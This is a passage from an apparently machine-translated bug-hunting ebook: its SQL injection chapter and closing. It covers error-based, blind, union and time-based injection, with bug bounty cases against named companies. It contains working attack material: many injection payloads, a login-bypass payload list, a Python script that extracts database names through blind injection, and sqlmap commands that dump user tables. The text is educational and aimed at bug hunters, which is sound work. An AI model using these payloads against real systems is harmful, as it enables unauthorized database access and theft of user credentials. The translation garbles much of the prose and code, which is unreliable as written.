the input validation applications (either web-based or mobile). Because of the lack of process
validation and screening of a given input, the user input will be processed
directly by the application and executed by the database. Through this same vulnerability testers can
enter SQL commands directly from the front-end through which the vulnerable parameter
finally can "make" testers to communicate with the database without having to have
access to it and without memerluhkan username and password used by database
itself.
In the execution, SQL Injection attacks themselves have considerable harmful effects,
ie as enable a person to be able to retrieve data stored on
database, modify data, and delete data in the database. One example of the impact
The worst of SQL injection attacks that enable a person to be able to take
(Or enumerate) existing username and password on a web application or even be
allows one to interact with the operating system used by the database
which exists.

Weather | 174
In the attack, the general testing is "obliged" to solicit input
contained in a web-based application in which there is a "relationship" with the command
SQL, for example, features featuring news, search features, as well as login feature. after getting
existing features, in general, the attacker will resume execution by entering the single
quote ( '), double quote ( "), or semicolon (;) in the corresponding parameter to identify
whether or not the parameter vulnerable to SQL Injection attacks.
Sample testing is usually done by the Testers in the initial phase is like. php? id = 1 '.
When the application displays an error message, then there is a possibility that the parameters id the vulnerable
against SQL injection attacks. As a simple note, in general, the error may appear
because the application is not capable of handling the input of special characters are included as
single quote ( ').
18.1. Kind of SQL Injection
Technically, SQL Injection attacks have several kinds, among which as error-based
SQL Injection, union-based SQL Injection and Blind SQL Injection. Each type of vulnerability
certainly has the characteristics and actions of different exploits. The following is
brief elaboration about the differences that exist:
18.1.1. Error Based SQL Injection
In the error-based SQL Injection, the examiner will send SQL queries to the database beforehand
through the parameters encountered vulnerable. This query will then be executed by the database
will generate an error. This error will usually be displayed on web applications in
in practice, the error message itself will be able to assist and provide guidance
to the examiner in conducting further attacks.
Here is an example piece of code that is created using PHP programmer language in
article search process.
<? Php

$ Result = $ mysqli-> query ( "select * from articles where title = $ search");
echo "Search Results". $ Results-> NUM_ROWS. "Results";
?>

Weather | 175
When explored further, it can be seen that the code is vulnerable to SQL injection attacks. This matter
because the parameters look for sent directly without sanitation and escape. This situation
certainly allows one to be able to submit SQL queries directly,
among them is executing the SELECT command to download the entire database
including personally identifiable information (PII) of users. In some cases it can also include
INSERT and UPDATE command to create the data (including user accounts) new or
modify existing data.
In detail, error-based SQL injection can be divided into two concepts, namely the concept of the comment line and
the concept of tautology.
The concept of the use of the comment line is made to cause the database ignore most
of a valid query. Examples such as the following: SELECT * from news WHERE id_news = 1 'OR 1 = 1 -
- The next query will not be processed by the database because it is considered a comment '.
While the concept of tautology, a query that is injected, is done by using the operator
OR conditional so that it will return true. In these situations, the examiner will send the value
which is always true as 1 = 1 or 'a' = 'a'. Examples of such as: SELECT * from tb_user WHERE
username = 'admin' and password = ' password ' or 1 = 1 '. This condition will certainly generate value
true because the condition 1 = 1 produces the correct value. Thus, any authentication process
is expected to be successfully passed.
18.1.2. Blind SQL Injection
Technically, not much different from what has been described related to error-based SQLI. however
Thus, the thing that made the difference is, the Blind SQL Injection, although a tester
has managed to do the injection, then the application does not display error messages / kesahalan on
the user's browser.
As a simple example, a tester using payload 'OR 1 = 1 --- + , If the statement
evaluated to true, then the browser will display the normal page. However, when evaluated as
false, then the page will have a different attitude to provide page view
different. Here is an example piece of code created using language programmers
PHP in article search process but does not display the data because it is not done echo.
<? Php

Weather | 176
$ Result = $ mysqli-> query ( "select * from articles where title = $ search");
// do not do echo so it will not display the data on the page
?>
Should be noted that this code also includes code that is vulnerable. However, the execution
be a little difficult than the error-based SQLI because testers can not see
error message on a given output.
For example, to facilitate understanding, concerning this, writers take one tutorial
written on a blog called securityidiots , Say there is a link
located in http://www.vuln-web.com/gallery.php?id=1 the situation that the parameter "id" vulnerable
against blind SQL Injection attack.
In this condition, the testers can try to enter the code "single quote" first
formerly behind the value of 1, so that the link be: http://www.vuln-web.com/gallery.php?id=1 '.
In general, the application will not menmapilkan error message (for the blind) and the page will load
content normally and did not seem the slightest alteration of the results of this injection. However,
injection should be followed by adding a bit of character like - behind the single quote,
so that the link will be http://www.vuln-web.com/gallery.php?id=1 '- , The due
id parameter is vulnerable parameter, then the result of this injection is expected to show
little change in content (and certainly without displaying the error message).
Thereafter, it is usually done by injecting a Boolean like ' or 1 = 1 so that
be as follows http://www.vuln-web.com/gallery.php?id=1 'OR 1 = 1 - - , result output from
this injection will restore the normal page for grades 1 = 1 is the same value
so it will produce the correct values. Further, when doing the injection uses
payload 'OR 1 = 0, should the application will not display the normal page for grades 1 = 0
merupakah different values so that it will produce incorrect results.
Once completed find such patterns, then the next step is to identify
Long used in the target database. To perform this test, the tester
need to do a brute force so finding changes in response behavior of the web
application.
'Or length (database ()) = 1 - - + → Does not generate an error, but there are small changes (false)

Weather | 177
'Or length (database ()) = 6 - - + → Normal page load without any change (True)
In the example above Bruteforce trial, it can be seen that behavioral changes occur in
6th trial, ensuring that the database character length of 6 (six)
character.
After knowing the length of the character database of 6 (six) characters, it is a
testers should do bruteforce character with a charge as follows:
( 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ! @ # $% ^ & * () _ + -.)
This in itself is done with the aim to get the character contained in the to-character
1 to 6 of the characters to a total of six (6) characters in the existing database.
For the record, if this step is done manually, it will be very time consuming because
should experiment one by one and requires patience and precision. The following
is an example:
'Or substring (database (), 1,1) =' a '- - + → Does not generate an error, but there are small changes
(False)
'Or substring (database (), 1,1) =' b '- - + → Does not generate an error, but there are small changes
(False)
'Or substring (database (), 1,1) =' c '- - + → Does not generate an error, but there are small changes
(False)
'Or substring (database (), 1,1) =' d '- - + → Normal page load without any change (True)
'Or substring (database (), 2,1) =' a '- - + → Does not generate an error, but there are small changes
(False)
'Or substring (database (), 2,1) =' b '- - + → Normal page load without any change (True)
'Or substring (database (), 3,1) =' _ '- - + → Normal page load without any change (True)
'Or substring (database (), 4.1) =' a '- - + → Normal page load without any change (True)

Weather | 178
'Or substring (database (), 5,1) =' p '- - + → Normal page load without any change (True)
'Or substring (database (), 6,1) =' p '- - + → Normal page load without any change (True)
Based on the above experiments, it is known that the name of the database used is named
db_app. To perform faster results require automated manner, a tester can
doing scripting to accelerate the work. Another alternative that can be done is
using Mapper.
For brief information, Blind SQL Injection has two different types of attacks, ie Boolean
and time-based.
18.1.3. Union-Based SQL Injection
In general, union-based SQL injection SQL injection is a technique that utilizes
UNION operator. It is useful to combine the results of two or more SELECT statements
become one.
No results will be returned as part of the HTTP response which will then be displayed
on the browser. Here is an example pseudecode of the injection process using techniques union
based.
SELECT * FROM tb_gallery WHERE id = 1 UNION SELECT 1, 2, database (), user () #
A simple explanation of the above query that when executed, then the application is vulnerable to
display content gallery which also displays the following database user information is used.
18.2. Basic Concept of SQL Injection Attack
Just like Cross Site Scripting, in general, an examiner is required to search for a feature
input and output on an application to be able to launch an SQL Injection attack. Some
examples of features that have inputs and outputs usually as search features, feature commentary, features
chat, ticketing features, and the like.
In the execution, the steps taken by an examiner can be reached by way of
automatically or manually. As for the automatic way, the tester can use a variety of
tools available such as SqlMap, SQL Ninja, and others.

Weather | 179
18.3. sample Cases
18.3.1. Error Based SQL Injection - Bootcamp.Nutanix.com Case
In September 2018, a researcher named Muhammad Khizer Javed succeeded in finding
Error-related vulnerability SQL Injection Based on one portal owned by Nutanix.
When finished recon and find the portal bootcamp.nutanix.com, he gained
login page display that attracts attention. Long story short, when they want to enter your email address
and password or carelessly, Javed does not have any information.
request:
POST / bootcamp / login HTTP / 1.1 Content-Type:
application / json Content-Length: 74 Referer: https://bootcamp.nutanix.com/
host: bootcamp.nutanix.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64) AppleWebKit / 537.21 (KHTML, like Gecko) Chrome / 41.0.2228.0
Safari / 537.21 Accept: * / *
{"e-mail":" Email@email.com "," Password "," passwordlol "}
Not finished until there, afterwards, Javed enter 1 \ ' in column e-mail with expectations
he got the message SQL error. Interestingly, the application turns out to restore dengam error
response contained in the parameter code.
Figure 183 Trying to injecting the Parameters

Weather | 180
Response:
HTTP / 1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application / json; charset = utf-8
Content-Length: 301
ETag: W / "12d-ZLo463k + S1SW5Z9MTAnhrr4EGvI" Date: Mon,
16 Jul 2018 18:20:13 GMT Connection: keep-alive
{ "Code": "ER_PARSE_ERROR", "errno": 1064, "sqlMessage": "You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '\' 'at line 1 "," SQLSTATE ":" 42000 "," index ": 0," sql
":" SELECT id from Users WHERE email = \ "1 '\' \ 'AND password = \"' \ ""}
Next Javed try to give Inpu form of payload which can remove related information
SQL version used on the target web. As for its payload is as follows:
a \ "and (extractvalue (1, concat (0x0a, @@ version))) #. In the response, any web application
"Serve" any request to display the value 8.0.11. This value is the database version
used on the target web:
Figure 184 Trying to Look the SQL Version
Based on the two experiments above, it can be concluded that the parameters e-mail vulnerable to
SQL Injection attacks. To speed up the work and the process of the attack, Javed use
Mapper tool to get the database contained on the target.
To conduct SQL injection process using Mapper, a step that needs to be done
is to copy the request on burpsuite and save on file.txt (can use a text editor
any). Then enter the * character in the parameter value at which you want to inject it
automatic.
Here is one example of a request that is stored in a simple file.txt (with
email parameter circumstances starred).

Weather | 181
POST / bootcamp / login HTTP / 1.1
Content-Type: application / json
Content-Length: 74
referrers: https://bootcamp.nutanix.com/
Host: bootcamp.nutanix.com
Connection: Keep-Alive
{"e-mail":" * "," Password "," passwordlol "}
Once stored in file.txt, then the next step is to run the command sqlmap
as follows:
sqlmap -r file.txt - risk 3 - level 5 --dbs
Thereafter, the tester only need to wait until sqlmap issued a positive outcome
(If indeed susceptible). As on that occasion, Javed obtain results in the form of information
database that is in the DBMS belong to the target:
Figure 185 SQL Injection Automation with SQL Map
18.3.2. Common Blind SQL Injection Attack - Zomato Case
As a recurrence, in contrast with error-based SQL Injection is very clear
provide information "error", the blind SQL Injection, an examiner is required to perform
many trials to achieve the desired output as has been noted on the concept

Weather | 182
previous base.
In December 2017, a researcher with the nick gerben_javado managed to find
Blind SQL Injection vulnerabilities associated with on-premises applications Zomato located in Zomato.com. On
On that occasion, javado found that vulnerable ENTITY_ID parameter injection.
The experiments conducted by him is to include payload 1 or
if (mid (@@ version, 1.1) = 5,1,2) = 2% 23. The function of this payload is aiming to find out
The first character of the version of the database used.
If the server on the target using the MySQL database with version 5.xx, then the condition of the injection results
This will generate value true. This in itself is because the first character has a value
that is true, that is worth five (5). The response generated from the application is the application
give return code 200 OK.
Furthermore, when javado inject payload 1 or if (mid (@@ version, 1,1) = 4, then output
produced is 500 error return code. This is false because the first character version
MySQL does not worth 4 but worth 5, so that the response generated
is a 500 error.
Here's a method used by Javado in the testing that has been done:
curl -H 'Host: www.zomato.com' -H 'Cookie: PHPSESSID = XXXXX'
'https://www.zomato.com/ ████. php? ENTITY_TYPE = restaurant & ENTITY_ID = 1 + or + if (mid (@@ version
on, 1.1) = 5,1,2) = 2% 23 ' - k
18.3.3. Blind SQL Injection Attack via User-Agent - Private Program
It is common knowledge examiners when searching for related SQL Injection vulnerability that is likely to be on
the parameters which an application either on the POST or GET method. However, there are
interesting things shown by a researcher with the nick fr0stNuLL successful
find related vulnerabilities Blind SQL Injection via the user-agent , Which as is well known that the user-
agent is one part of the HTTP header of an HTTP Request.
For the record, in general, user-agent is basically used to display information
in the form of OS along with the browser used by the client.
In this situation, fr0stNuLL try to see the difference between giving a single quote ( ') to a user-

Weather | 183
agent with no add anything into it. Long story short, look no information
anything other than "OK" in response when sending a POST request is simple.
Figure 186 Normal Response - without any single quote
Then when given the form of the single quote special characters in a user agent that is delivered,
has application issued a unique response, namely Unauthorized.
Figure 187 Unauthorized Response after injecting the User-Agent
Judging from the results, of course this seems strange. Because it should turn on the user-agent value
does not affect the response. From here, fr0stNuLL realized that the possibilities
large, user-agent is recorded in the database, so that whenever a request is sent, then
there will be penyocokan between user-agent used by visitors with a user-agent
contained in the database.
For the next step, fr0stNuLL tried to inject the payload ' AND '1' = '1 with
the hope of obtaining a true value on the response (for payload aims to restore
the value of being true). It draws from this execution arises, the application returns the response OK
as shown in the following figure:

Weather | 184
Figure 188 Injecting with "True" Payload - Success
To make sure that this parameter really vulnerable to SQL Injection, it fr0stNuLL
also tried to change the payload injection into ' AND '1' = '2 which means the output generated should
is false (because its value is not the same one with a value of 2).
When the payload is sent, it turns out app gives Unauthorized response as indicated
in the following figure:
Figure 189 Injecting with "False" Payload - Success
Seeing this situation, it can be ascertained that the application is actually vulnerable to SQL
Injection (Blind method) on the user-agent.
To extract more information, then fr0stNuLL trying to figure out which version
database used by the target at the time. The payload used is' and
substring (@@ version, 1,1) = 1 = '1' '.
The purpose of this payload is to find out the value of the first character-related
database used by targets. If the first character of its value is 1, it will generate
OK response. But if not, it will generate value Unauthorized.
Here is an example of the injection to find the first character to be used by
database:

Weather | 185
Figure 190 Injection Attempt to Find out the Database Name
And what about the character of the second? Then the tester must return to repeat the initial stage, ie
by entering the payload: ' and substring (@@ version, 1, 2 ) = 1 = ' 1 ''
The meaning of this payload is trying to see if the character to the 2nd from the database used, valuable
number 1 or not. Long story short, the character is colored red a placement
character ( for example, a character first, second, third, and so on), while the characters are given
green color is the value of the character you wish to search.
'Or substring (@@ version, 1, 2 ) = ' a '' - - + → Does not generate an error, but produces output
Unauthorized, so that the second character is not worth a.
'Or substring (@@ version, 1, 5 ) = ' x '' - - + → Does not generate an error, but produces output
Unauthorized, so the fifth character is not worth x.
'Or substring (@@ version, 1, 9 ) = ' M '' - - + → Does not generate an error, but produces output
"OK", so that the ninth character certainly worth M.
'Or substring (@@ version, 1, 14 ) = ' d '' - - + → Does not generate an error, but produces output
"OK", so the character to fourteen certainly worth d.
And so on until the entire character is obtained.
It is indeed quite time consuming when done manually, so inevitably must
make a little simple script to re-automate things are there. The experiments were carried out
of character uppercase, lowercase, numbers, and symbols such as the following:
( 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ! @ # $% ^ & * () _ + -.)
Armed with experiments conducted by fr0stNuLL, finally he managed to obtain
value database version used, ie 10/01/21 MariaDB.

Weather | 186
18.3.4. Time Based SQL Injection - Starbucks Program
Specifically, this type of attack time-based SQL Injection has similarities with Blind SQL
Injection. The thing that is the basis of the difference in this situation is an examiner must
notice / observe behavioral changes contained in the response of a web application.
The intended behavior in the form of "response time" provided by the application in any
answering requests granted (such as injection). For example, a tester injects
a payload in the form of ' OR SLEEP (10) -, when a vulnerable application, then the application will give
true results with response time during the ten (10) seconds.
One obvious example is instructive related to this is when a researcher
named toctou who managed to find time-based SQL Injection at Starbucks-owned program ,
On that occasion, toctou found group_id parameters that exist in this news.starbucks.com
is vulnerable to attack and in the first experiment, try to inject toctou
The parameters of the payload 1'-IF (1 = 1, SLEEP (1), 0) AND group_id = '1.
For information, function IF the database is a function that acts as a good condition
when something is true or when something is false. For example, so on
payload IF (1 = 1, SLEEP (5), 0), that is, if 1 is equal to 1, it will return true
form SLEEP command for 5 seconds. If its output is false, then the value returned
is a value of 0 can be 0, xx seconds.
Returning to the case at starbucks, when toctou enter payload 1'-IF (1 = 1, SLEEP (1), 0) AND
group_id = '1, it means that its output is true and should happen sleep for 1 second.
However, what happens to starbucks is giving response refund application
During 13 sec.
Figure 191 Attack Trial Time-Based SQL Injection

Weather | 187
on occasion that, toctou back using the payload other as 1'-
IF (MID (VERSION (), 1,1) = '4', SLEEP (1), 0) AND group_id = '1'.
This payload has the intention to know the version of the DBMS used in the application. when upgraded
starting from the character "4", then what happens is, the application should execute SLEEP during
1 second. But if not, then do not produce SLEEP.
Figure 192 Application did not Sleep
As shown in the picture above, it appears that the application does not run into SLEEP due
its response time is worth only 251 millis, or about 0.25 seconds.
Toctou then tried another payload and found that the version used by the DBMS
Starbucks begins with the character "5". This in itself can be seen from a long response
provided by the application when he injects the payload 1'-IF (MID (VERSION (), 1,1) = '5', SLEEP (1), 0)
AND group_id = '1'. In this case, the resulting response time is 13 seconds (remember, do not get confused
with the number 13 this moment, because it fits in this case, the value of 1 second to true, it is worth 13 seconds.
In reality, of course can only be entered in accordance with expectations, ie for example 1
seconds).

Weather | 188
Figure 193 Found the DBMS Version
Based on the entire trial, then he was immediately "carry" the DATA request
susceptible to automation tools such as SqlMap that ultimately lead to optimal results.
Figure 194 Time-Based SQL Injection with SQL Map

Weather | 189
18.3.5. Simple SQL Injection to bypass Login Form - Sample from Multillidae II
To be honest, this vulnerability is quite rare in modern applications that exist today. however
Thus, this guide will still load it as a complement of the explanations that have been
previously submitted.
PortSwigger on one of the articles related testing methodologies , Has delivered one
how to log into an executable application by using SQL Injection. The
for example, PortSwigger using OWASP application Multillidae II.
Long story short, when an examiner discovers a login form, then the testers can try
to login with a simple payload like ' or 1 = 1 -.
Figure 195 Sample of Injection at Login Form
In practice, this payload itself can also be entered into the username and password
simultaneously.
When the correct login form is vulnerable, then there is an examiner will be able to log on
directly to the account of "target".
Figure 196 Success to Login

Weather | 190
Why does this happen?
In simple terms, SQL Injection entered payload will be executed by the database with
picture as follows:
SELECT * FROM users WHERE username = ' ' OR 1 = 1-- ' AND password = 'foo'
Since there are command - , Then the query of ' AND password 'foo' will not be executed by
database. This is not because the database will take it as a comment (do not need
executed). When concluded, the payload that will essentially end a query menghasil
following:
SELECT * FROM users WHERE username = ' ' OR 1 = 1--
Long story short, this query will generate true value and would work to "pass" the login page.
Then if there is another payload that can be used as an alternative to injection? The answer is, yes,
there is. The following is a list of payload in question:
or 1 = 1 or 1 = 1- admin ') or' 1 '=' 1 '#
or 1 = 1 # or 1 = 1 / * admin') or '1' = '1' / *
admin '-admin' # admin "-admin" #
admin '/ * admin' or '1' admin "/ * admin" or "1"
= '1 admin' or '1' = '1'- = "1 admin" or "1" = "1"
admin 'or' 1 '=' 1 '# -admin "or" 1 "=" 1 "#
admin' or '1' = '1' / * admin" or "1" = "1 "/ *
admin'or 1 = 1 or '' = ' admin 'or 1 = 1 or' '='
admin 'or 1 = 1 admin' or
1 = 1-admin 'or 1 = 1 #
admin 'or 1 = 1 admin' admin' or 1 = 1 / * admin ")
or 1 = 1-admin 'or 1 = 1 # or (" 1 "=" 1 admin ") or (" 1
admin' or 1 = 1 / * admin "=" 1 "-admin") or ( "1" = "1"
') or (' 1 '=' 1 admin ') or (' # admin ") or (" 1 "=" 1 "/ *
1 '=' 1 '-admin') or ( '1' = admin") or "1" = "1 admin")
'1' # admin ') or (' 1 '=' 1 '/ or "1" = "1" -admin ") or" 1
* admin') or '1' = '1 "=" 1 "# admin") or "1" = "1"
admin') or '1' = '1' - /*

Weather | 191
18.3.6. Error Based SQL Injection with Page Redirection - Private Program
Once, the writer was testing an application on a private programs that have multiple
SQL Injection vulnerabilities associated with the same parameters, but located in different functions
different. Let's say that almost every function it has a model like the following URL:
target.com/path/some_function.php?ParA=xyz&ParB=opq. In this condition, almost the entire
The parameter can be injected either manually or automate (and of course execution
automate it will be easier to remember that it has been proven vulnerability).
However, problems arise when the author has noticed a function which is believed to be vulnerable
but each managed to inject the payload length of the right character, has application to redirect
to other pages that are in CloudFront.
A simple example of its flow:
• inject code ' in Para, and issuing application error.
• entering payload 'Or length (database ()) = 3 - - + , The application still emits error (because
not length correct database name).
• entering payload 'Or length (database ()) = 9 - - + , (Say his name length database
is 9 characters), it turns out immediately redirect applications to CloudFront used. When
The author tries to automate the execution of the SQL Map, turns SQL Map regard
that is not vulnerable.
Departing from this situation, finally made a simple script that can automate
the withdrawal of the information on the database. Here is an overview of its first user flow
first:
'Or substring (database (), 1,1) =' a '- - + → Not redirect, but still there are errors → then
said that the character "a" is false
'Or substring (database (), 1,1) =' e '- - + → Not redirect, but still there are errors → then
said that the character "e" is false
'Or substring (database (), 1,1) =' t '- - + -> redirect to CloudFront, it can be stated that the "t"
is the first character to be used as the database name (true)

Weather | 192
And here is a simple script that is used to re-automate things that are:
import import requests
urllib.parse
headers = { 'User-Agent': 'Mozilla / 5.0 (Macintosh; Intel Mac OS X 10:14; rv: 66.0) Gecko / 20100101 Firefox / 66.0'}
url = 'https://target.com/path/somefunction.php?ParB=opq&ParA='
cookieWeb = dict (usercookie1 = 'put_the_value_here', AWSCookieHere = 'put_the_value_here') def getDBLength (): for x
in range (1,50):
payload = '' OR length (database ()) = {} - - + ". format (x) FinalUrl = url
+ payload
req = requests.get (FinalUrl, cookies = cookieWeb, headers = headers) if (req.text.find (
"CloudFront")! = -1): return x
def getDBname (length): db = ''
char = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" for x in range (1, length
+ 1): for y in range (len (char)):
payload = urllib.parse.quote ( " 'or substring (database (), {}, 1) = {} - - +". format (x, hex (ord (char [y])))) FinalUrl = url + payload
req = requests.get (FinalUrl, cookies = cookieWeb) if
(req.text.find ( "CloudFront")! = -1): print (char [y]); db + = char
[y] break
output = '[+] Database:' + '' .join (str (e) for e in db) return
output
def main ():
x = getDBLength ()
print ( "[+] Database Length:" + str (x)) print ( "[+] Try
to get the database name ... ') print (getDBname (x))
if __name__ == "__main__":
main ()

Weather | 193
Thus, the purpose of this script is the script will make the detection of the word "CloudFront" on
response from an application when the payload has been successfully injected "touching" the value "true".
When the script has finished executing, then its output will be as follows:
root @ times : ~ # Python script.py [+]
Database Length: 9 [+] Try to get the
database name ... targetxyz
[+] Database: targetxyz
From these results, it was found that its database name length is 9 characters and named
targetxyz. (This script would be used when the reader finds a similar situation with
condition parameters in the application is processed at the GET Method).
18.4. Auto SQL Injection with Mapper (Basic Use)
In some situations that have been submitted previously, visible when several testers have
use a tool called Mapper in order to facilitate the execution. On
On this occasion, the author also wanted to discuss the general picture sqlmap use the
expected to help the reader to learn.
Quotes from the official page , Mapper is a tool used for testing
automate the process of detecting and exploiting SQL Injection vulnerability (also on the situation
particular, can detect vulnerabilities Cross Site Scripting - although it can be said not optimal).
In general, this tool has many features that can be used by the testers,
as can take the contents of the database automatically (so no need to enter a query
manual injection), won the shell access without undue difficulty, do
download to a file (after the execution of successful SQL Injection) without bersusah-

Weather | 194
terrible at remembering query is needed, have the support of various types of DBMS
(Such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite,
Firebird, Sybase, SAP MaxDB, Informix, HSQLDB and H2), and many more.
Technically, this tool itself can be downloaded on their official github located at
https://github.com/sqlmapproject/sqlmap , When testers using Linux Kali, then this tool
already contained in it, so no need to download again.
18.4.1. Way to Use the SQL Map
There are two steps use the SQL Map which can be used by the testers, namely by
includes all parameters along with cookies on the terminal (say direct command), and one
again by entering the entire HTTP Request data into a file for processing
automatic.
Surely more audible mengasikan for the second step is not it?
18.4.1.1. Basic Concept
Before going further, it would be better to be understood that the process of extracting data from SQL
Map will fairly structured DBMS, Database, Table, Column, and then finally Data.
Given this sequence will be easier for testers to understand the existing command
SQL Map.
• Simply put, when the SQL Map discovered SQL Injection vulnerabilities on a
application, then it will be done by it is detected beforehand would Database
Management System used (such as MySQL, Microsoft SQL, PostgreSQL, and
other).
• Once successful, only then can the SQL Map will try to achieve the Database name
is used which can then be followed to extract the table contained therein.
• From this table, then the examiner will be able to extract the column along with the data contained in the column
related.
After understanding this structure, and then poured into a folder SQL commands, such as:
• - - dbs to view the entire database is listed on the DBMS used
• - D pilih_database --table : to extract the tables in the selected database

Weather | 195
• - D pilih_database -T pilih_tabel --column : to extract the selected column in the table
• - D pilih_database -T pilih_tabel - C pilih_kolom --dump : to extract the data in column
The selected.
18.4.1.2. Using SQL Map via Direct Command
Say a tester has found a SQL Injection vulnerability on the GET method in
parameter X belonging target.com → target.com/function.php?parX= <vulnerable>
With the manual method, of course, the examiner must include the payload one by one at the Parx
listed on the URL. However, with the SQL Map, then testers only need to put an *
at Parx and then "let" SQL Map resume execution. Example:
sqlmap -u "http: // target.com/function.php?parX=*" --dbs
When completely vulnerable, then the SQL Map will output the information containing the DBMS
used as well as databases that exist in it.
[9:12:57] [INFO] testing the connection to the targeted url
sqlmap identified the following injection points with a total of 0 HTTP (s) requests:
---
Parameters: id (GET)
Type: error-based
Title: MySQL> = 5.0 AND error-based - WHERE or HAVING clause
Payload: id = 51 AND (SELECT 1489 FROM (SELECT COUNT (*), CONCAT (0x3a73776c3a, (SELECT (CASE WHEN (1489 = 1489) THEN 1 ELSE
0 END)), 0x3a7a76653a, FLOOR (RAND (0) * 2) ) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
---
[9:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache 2.4
back-end DBMS: MySQL 5
[9:13:00] [INFO] fetching names database
[9:13:00] [INFO] used the SQL query returns 3 entries
[9:13:01] [INFO] resumed: information_schema
[9:13:02] [INFO] resumed: db_app
[9:13:03] [INFO] resumed: mysql

Weather | 196
available databases [3]:
[*] Information_schema
[*] Db_app
[*] Mysql
After you get this output, of course, a tester can proceed with:
• Extracting table in the database. Say the selected database is db_app, then
his command is:
sqlmap -u "http: // target.com/function.php?parX=*" -D db_app --tables
output
---
Type: error-based
---
Web application technology: PHP 5.x.xx
Back-end DBMS: MySQL
[9:17:00] [INFO] fetching tables for the database: 'db_app'
[9:17:00] [INFO] used SQL query returns 2 entries
Database: db_app
[2 tables]
+ ------ ---- ---- ---- -- +
| table_User |
| table_Level |
+ ------ ---- ---- - --- -- +

Weather | 197
• Then, extract the column in the table who have successfully obtained:
sqlmap -u "http: // target.com/function.php?parX=*" db_app -D -T table_user --columns
output
---
Type: error-based
---
Database: db_app
Table: table_users
[3 columns]
+ ------ ---- ---- - -- + - ---- ----- ---- --- +
| Column | Type |
+ ------ ---- ---- --- + - ---- ----- ---- --- +
| e-mail | varchar (30) |
| username | varchar (70) |
| password | varchar (32) |
+ ------ ---- ---- ---- + ---- ----- ---- --- +
• Afterwards, the new followed by extracting the data in column who have successfully
obtained:
sqlmap -u "http: // target.com/function.php?parX=*" db_app -D -T -C table_user
email, username, password --dump
output
---

Weather | 198
Type: error-based
---
Database: db_app
Column: email, username, password
[15 entries]
+ ------ ---- ---- ---- ---- ---- --- + -- ---- ---- ---- ---- ---- --- + - ---- ---- ---- ----- ---- -- - +
| E-mail | username | password |
+ ------ ---- ---- ---- ---- ---- --- + -- ---- ---- ---- ---- ---- --- + - ---- ---- ---- ----- ---- -- -- +
| email1@email.com | username1 | password1 |
| email2@email.com | USERNAME2 | password2 |
| email3@email.com | USERNAME3 | Password3 |
| email4@email.com | Username4 | Password4 |
| email5@email.com | Username5 | Password5 |
+ ------ ---- ---- ---- ---- ---- --- + -- ---- ---- ---- ---- ---- --- + - ---- ---- ---- ----- ---- -- -- +
18.4.1.3. Using SQL Map via Saved Files
In summary, this method has been discussed at issue SQL Injection in assets belonging to Nutanix. but to
enrich the discussion, the authors incorporate it with a slightly different explanation.
Say a tester has found a SQL Injection vulnerability in the POST method in
parameter X belonging target.com → target.com/function.php (POST Method: Parx).
/Function.php POST HTTP / 1.1
referrers: https://www.target.com
Host: target.com

Weather | 199
Parx = hello + world
To make the execution of SQL Injection is running SQL Map, then steps need
do is to copy the entire request to burpsuite and save on file.txt (can
use any text editor). Then continue by entering the code * on the part
parameter value at which you want to inject automatically.
Here is one example of a request that is stored in a simple file.txt (with
email parameter circumstances starred).
/Function.php POST HTTP / 1.1
referrers: https://www.target.com
Host: target.com
Parx = *
Once stored in file.txt, then the next step is to run the command sqlmap
as follows:
sqlmap -r file.txt - risk 3 - level 5 --dbs
Thereafter, the tester only need to wait until sqlmap issued a positive outcome (if
is vulnerable). Next, testers only need to run a command as submitted
in the previous point (related --tables -D, -D --columns -T, -C and -D -T --dump).

Weather | 200
18.4.2. Simple Cover - SQL Map
Thus a simple trip on the use of SQL Map. Of course there are many features that
can be used as encoding so that the injection is done with the characters have been changed
advance its format.
18.5. Reference of SQL Injection
In order to maximize the understanding of the exposures that have been submitted related to SQL
Injection, the testers can refer to some of the following references:
• Akamai Report Q4 2017 State of The Internet Security Reports
https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q4-2017-state-
of-the-internet-security-report.pdf
• OWASP TOP 10 2017
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
• OWASP TOP 10 2017 - A1 Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
• SQL Injection Cheat Sheet
https://portswigger.net/web-security/sql-injection/cheat-sheet
• Blind SQL Injection Tutorial:
http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html
• How to Prevent SQL injection Attacks
https://www.wordfence.com/learn/how-to-prevent-sql-injection-attacks/
• What is SQL Injection (SQLi) and How to Prevent It
https://www.acunetix.com/websitesecurity/sql-injection/
• [Nutanix] SQL injection on Bootcamp
https://blog.securitybreached.org/2018/09/08/sqli-bootcampnutanix-com-bug-bounty-poc/
• [Zomato] Boolean Blind SQL injection

Weather | 201
• PoC - Blind SQL Injection throught Boolean User Agent
https://medium.com/@frostnull1337/sql-injection-through-user-agent-44a1150f6888
• [Starbucks] Time-Based Blind SQL Injection
https://timeofcheck.com/time-based-blind-sqli-on-news-starbucks-com/
• Methodology SQL Injection Auhtentication Bypass
https://support.portswigger.net/customer/portal/articles/2791007-
Methodology_SQL_Injection_Authentication_.html
• SQL injection Auhtentication Cheat Sheet Bypass
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
• repository SqlMap
https://github.com/sqlmapproject/sqlmap

Weather | 202
CLOSING EDITION FIRST

Weather | 203
CLOSING
Not noticeably, it has come to the end part of this ebook. Thus, finished
own ebook "Bug Hunting 101" first edition.
There is no power and effort besides on God's help alone. Only to Allah we ask
taufiq and His guidance. Praise be to Allah, the Lord of the Worlds.
May the peace and blessings always devoted to the Prophet Muhammad sallallaahu 'alaihi wa
sallam, family, friends, and always follow them well until doomsday future.
The authors and the team hopes may Allah make it easier for We are all to be
